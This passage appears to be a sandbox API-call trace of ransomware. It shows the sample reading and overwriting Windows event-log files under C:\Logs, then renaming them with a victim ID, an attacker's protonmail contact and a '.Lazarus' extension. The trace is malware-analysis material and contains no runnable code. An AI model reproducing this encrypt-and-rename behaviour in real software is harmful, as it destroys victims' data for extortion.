lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x7ab78, cchWideChar=20 | out: lpWideCharStr="C:\\Logs\\System.evtx") returned 20 [0073.499] CreateFileW (lpFileName="C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0073.499] GetFileType (hFile=0x410) returned 0x1 [0073.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ab78 | out: hHeap=0x20000) returned 1 [0073.500] CloseHandle (hObject=0x410) returned 1 [0073.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0073.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0073.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0073.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0073.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0073.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0073.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0073.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0073.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0073.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0073.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0073.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0073.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.500] AreFileApisANSI () returned 1 [0073.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0073.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x28) returned 0x7aa88 [0073.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x7aa88, cchWideChar=20 | out: lpWideCharStr="C:\\Logs\\System.evtx") returned 20 [0073.500] GetFileAttributesExW (in: lpFileName="C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505097c4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505097c4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000)) returned 1 [0073.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7aa88 | out: hHeap=0x20000) returned 1 [0073.500] AreFileApisANSI () returned 1 [0073.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0073.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0073.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0073.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0073.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0073.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0073.501] GetLastError () returned 0x0 [0073.501] SetLastError (dwErrCode=0x0) [0073.501] AreFileApisANSI () returned 1 [0073.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0073.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x28) returned 0x7ac98 [0073.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x7ac98, cchWideChar=20 | out: lpWideCharStr="C:\\Logs\\System.evtx") returned 20 [0073.501] CreateFileW (lpFileName="C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0073.501] GetFileType (hFile=0x410) returned 0x1 [0073.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ac98 | out: hHeap=0x20000) returned 1 [0073.501] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0073.501] ReadFile (in: hFile=0x410, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0073.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0073.504] ReadFile (in: hFile=0x410, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0073.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0073.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0073.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4ddc8 [0073.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x90450 [0073.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0073.505] GetLastError () returned 0x0 [0073.505] SetLastError (dwErrCode=0x0) [0073.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0073.505] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0073.505] WriteFile (in: hFile=0x410, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0073.506] WriteFile (in: hFile=0x410, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0073.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0073.506] CloseHandle (hObject=0x410) returned 1 [0073.642] AreFileApisANSI () returned 1 [0073.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0073.645] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x28) returned 0x7a908 [0073.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x7a908, cchWideChar=20 | out: lpWideCharStr="C:\\Logs\\System.evtx") returned 20 [0073.645] CreateFileW (lpFileName="C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0073.645] GetFileType (hFile=0x410) returned 0x1 [0073.645] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a908 | out: hHeap=0x20000) returned 1 [0073.645] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0073.645] ReadFile (in: hFile=0x410, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0073.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0073.646] ReadFile (in: hFile=0x410, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0073.646] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dfc0 [0073.646] GetLastError () returned 0x0 [0073.646] SetLastError (dwErrCode=0x0) [0073.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0073.646] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0073.646] WriteFile (in: hFile=0x410, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0073.647] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0073.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0073.647] CloseHandle (hObject=0x410) returned 1 [0073.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0073.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0073.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0073.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x69db0 [0073.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0073.671] AreFileApisANSI () returned 1 [0073.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0073.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x28) returned 0x7a9c8 [0073.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x7a9c8, cchWideChar=20 | out: lpWideCharStr="C:\\Logs\\System.evtx") returned 20 [0073.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x69db0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0073.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5fbb8 [0073.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x69db0, cbMultiByte=-1, lpWideCharStr=0x5fbb8, cchWideChar=82 | out: lpWideCharStr="C:\\Logs\\System.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 82 [0073.672] MoveFileExW (lpExistingFileName="C:\\Logs\\System.evtx" (normalized: "c:\\logs\\system.evtx"), lpNewFileName="C:\\Logs\\System.evtx.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\logs\\system.evtx.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0073.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0073.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a9c8 | out: hHeap=0x20000) returned 1 [0073.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0073.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0073.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0073.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0073.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0073.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0073.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0073.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0073.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0073.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0073.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0073.673] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.673] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.673] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0xf9584475, dwReserved1=0x97df6623, cFileName="Windows PowerShell.evtx", cAlternateFileName="WINDOW~1.EVT")) returned 1 [0073.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0073.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0073.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0073.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0073.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0073.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0073.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0073.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0073.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0073.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0073.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0073.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0073.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0073.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0073.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0073.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0073.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0073.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0073.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0073.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0073.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0073.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0073.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0073.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0073.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0073.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0073.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0073.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0073.674] AreFileApisANSI () returned 1 [0073.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Windows PowerShell.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Windows PowerShell.evtx", lpUsedDefaultChar=0x0) returned 32 [0073.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0073.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.674] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0073.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0073.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0073.674] AreFileApisANSI () returned 1 [0073.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32 [0073.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0073.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=32 | out: lpWideCharStr="C:\\Logs\\Windows PowerShell.evtx") returned 32 [0073.674] CreateFileW (lpFileName="C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0073.674] GetFileType (hFile=0x410) returned 0x1 [0073.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0073.675] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0073.675] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0073.675] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0073.675] CloseHandle (hObject=0x410) returned 1 [0073.675] AreFileApisANSI () returned 1 [0073.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32 [0073.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0073.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=32 | out: lpWideCharStr="C:\\Logs\\Windows PowerShell.evtx") returned 32 [0073.675] CreateFileW (lpFileName="C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0073.675] GetFileType (hFile=0x410) returned 0x1 [0073.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0073.676] CloseHandle (hObject=0x410) returned 1 [0073.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0073.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0073.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0073.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0073.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0073.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0073.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0073.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0073.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0073.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0073.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0073.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0073.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0073.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0073.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0073.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0073.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0073.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0073.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0073.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0073.676] AreFileApisANSI () returned 1 [0073.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32 [0073.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0073.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=32 | out: lpWideCharStr="C:\\Logs\\Windows PowerShell.evtx") returned 32 [0073.676] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0073.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0073.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0073.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0073.677] HeapFree 